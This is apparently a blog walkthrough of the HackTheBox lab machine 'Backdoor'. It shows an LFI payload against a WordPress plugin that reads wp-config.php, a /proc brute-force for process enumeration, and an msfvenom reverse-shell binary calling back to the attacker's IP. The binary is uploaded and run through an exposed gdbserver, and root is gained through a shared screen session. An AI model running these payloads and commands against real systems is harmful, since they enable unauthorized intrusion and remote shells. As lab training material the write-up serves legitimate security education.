Prelude
Backdoor was an easy machine from HTB, developed by hkabubaker17. The initial foothold vector was pretty cool, where we need to enumerate the running processes of the target machine using an LFI vulnerability present in a WordPress plugin. Once we have enumerated the processes, we’ll find that one of the open ports is gdb server’s remote debugging port.
We can then connect to that port and execute a malicious elf file to gain reverse shell on the target. After that, we can see that there’s a screen session running as root, which is accessible by the low priv user. We can then attach to that root screen session to escalate privileges.
Let me elaborate on how I solved this box.
Exploitation
Nmap returned the following results.
Nmap scan report for 10.10.11.125
Host is up (0.051s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 b4:de:43:38:46:57:db:4c:21:3b:69:f3:db:3c:62:88 (RSA)
| 256 aa:c9:fc:21:0f:3e:f4:ec:6b:35:70:26:22:53:ef:66 (ECDSA)
|_ 256 d2:8b:e4:ec:07:61:aa:ca:f8:ec:1c:f8:8c:c1:f6:e1 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Backdoor – Real-Life
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-generator: WordPress 5.8.1
|_http-server-header: Apache/2.4.41 (Ubuntu)
1337/tcp open waste?
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
There’s are 3 ports open, with a peculiar port 1337
. I tried banner grabbing the port with nc
, but the port didn’t display any banner after connecting to it.
So, I directed the enumeration to port 80
.
I Navigated to http://10.10.11.125/index.php/ and found a wordpress page.
![](https://secnigma.wordpress.com/wp-content/uploads/2022/01/pasted-image-20211231170454.png?w=810)
Pressing on home navigated to backdoor.htb.
![](https://secnigma.wordpress.com/wp-content/uploads/2022/01/pasted-image-20211231170512.png?w=534)
So, to test Virtual host routing, I added an entry to /etc/hosts
and refreshed the page, but nothing changed.
I then ran wpscan
with scan mode set to aggressive
. But, it didn’t found anything useful except that the site have directory listing enabled.
![](https://secnigma.wordpress.com/wp-content/uploads/2022/01/pasted-image-20211231203139.png?w=830)
So, with the help of this blog, I started manual enumeration of the WordPress plugins by navigating to /wp-content/plugins
directory to view the installed plugins. Since, directory listing is enabled, we should get a list of installed plugins.
I navigated to http://backdoor.htb/wp-content/plugins/ and found the following.
![](https://secnigma.wordpress.com/wp-content/uploads/2022/01/pasted-image-20211231203354.png?w=696)
I searched the plugin name in searchsploit and sure enough, there’s a hit!
Found an exploit for an LFI vulnerability in the plugin ebook-download
.
I confirmed the vulnerability by using the following payload.
http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php
I got the credentials to the MySQL service from wp-config.php
. So, I tried the credentials in the SSH service, but they didn’t work.
Then I decided to enumerate the target further, by leveraging the LFI vulnerability we have at hand.
Found a GitHub repo to enumerate machine via the LFI vuln.
I used the following command to run the network-info
script.
bash network-info 'http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl='
![](https://secnigma.wordpress.com/wp-content/uploads/2022/01/pasted-image-20220101212210.png?w=981)
Then I used the process-info
script, which bruteforces the /proc/$pid/cmdline
location /to enumerate the running processes.
However, the target server didn’t respond to /proc/sys/kernel/max_pid
.
The script used the output of this file to determine the maximum number of bruteforce attempts to perform and because the target server didn’t respond to this file, I modified the script a little with my machine’s max_pid.
![](https://secnigma.wordpress.com/wp-content/uploads/2022/01/pasted-image-20220101211851.png?w=441)
I ran it using the following command.
bash process-info 'http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=' > out.txt
After saving the raw PID bruteforcing output to out.txt
, I cleaned out the unwanted strings using the following bash one liner into a file named test.out
.
cat out.txt|sed -e 's:/proc/[0-9]\{1,6\}/cmdline::g' -e 's:<script>window.close()</script>::g' -e 's/PID:\ [0-9]\{1,5\}//g' > test.out
I used the following command to save it into a new file named test2.out
with line numbers; so that line number = pid.
cat test.out|grep -n . > test2.out
![](https://secnigma.wordpress.com/wp-content/uploads/2022/01/pasted-image-20220101211233.png?w=486)
Then I deleted lines that doesn’t contain alphabets, so that the lines with empty lines will get deleted.
cat test2.out|sed -e '/[a-z]/!d' > pids
Now, I have the complete process list of the target.
![](https://secnigma.wordpress.com/wp-content/uploads/2022/01/image.png?w=881)
This output shows us that the port 1337
is a port that is opened by gdbserver.
Gdb server is a program used to perform remote debugging, so that we can runGDB on one machine and the program being debugged on another over network.
So, to confirm we can connect to the gdb session, I entered gdb
and typed the following command to connect my client to the remote gdb debugging session.
target remote 10.10.11.125:1337
![](https://secnigma.wordpress.com/wp-content/uploads/2022/01/pasted-image-20220101212711.png?w=789)
I then quit gdb and made some research on how to upgrade this gdb session to code execution.
By refering to this hacktricks page, I managed to get a reverse shell from this gdbserver session. I did the following steps to get a reverse shell from the remote gdb session.
I created an elf binary and uploaded it using gdb.
msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.75 LPORT=9001 PrependFork=true -f elf -o binary.elf
Then, made it executable.
chmod +x binary.elf
Then opened the file in gdb.
gdb binary.elf
After that, I uploaded the binary and executed it using gdb.
# Set remote debuger target
target extended-remote 10.10.11.125:1337
# Upload elf file
remote put binary.elf binary.elf
# Set remote executable file
set remote exec-file /home/user/binary.elf
# Execute reverse shell executable
run
And I got a shell back!
![](https://secnigma.wordpress.com/wp-content/uploads/2022/01/pasted-image-20220101221457.png?w=536)
![Self Five! GIF - HIMYM How I Met Your Mother Barney Stinson - Discover & Share GIFs](https://c.tenor.com/-YPukbu3zUkAAAAC/himym-how-i-met-your-mother.gif)
Privilege Escalation
From the early enumeration, I saw that there’s a screen session running in the name root
. For the uninitiated, Screen or GNU Screen is a terminal multiplexer, a software application that can be used to multiplex several virtual consoles, allowing a user to access multiple separate login sessions inside a single terminal window, or detach and reattach sessions from a terminal.
The root
user had an ACL set for user
in /root/.screenrc
![](https://secnigma.wordpress.com/wp-content/uploads/2022/01/pasted-image-20220102141550.png?w=298)
This allows the user
to fully access the root user’s screen session.
Now, this file isn’t accessible to low privileged users. But nevertheless, I decided to test if the low privileged user had access to the active root session.
I tested this using the following command.
screen -r root/root
The syntax is as follows:
screen -r <owner><screen-session-name>
And I got into a root screen session!
![](https://secnigma.wordpress.com/wp-content/uploads/2022/01/pasted-image-20220102141738.png?w=417)
![Best Himym Barney What Up GIFs | Gfycat](https://thumbs.gfycat.com/DigitalGorgeousArmyworm-size_restricted.gif)
Postlude
And that was Backdoor!
A great machine with demonstrated how cool enumeration can be!
Kudos to hkabubaker17 for building such an awesome box!
Peace out! ✌️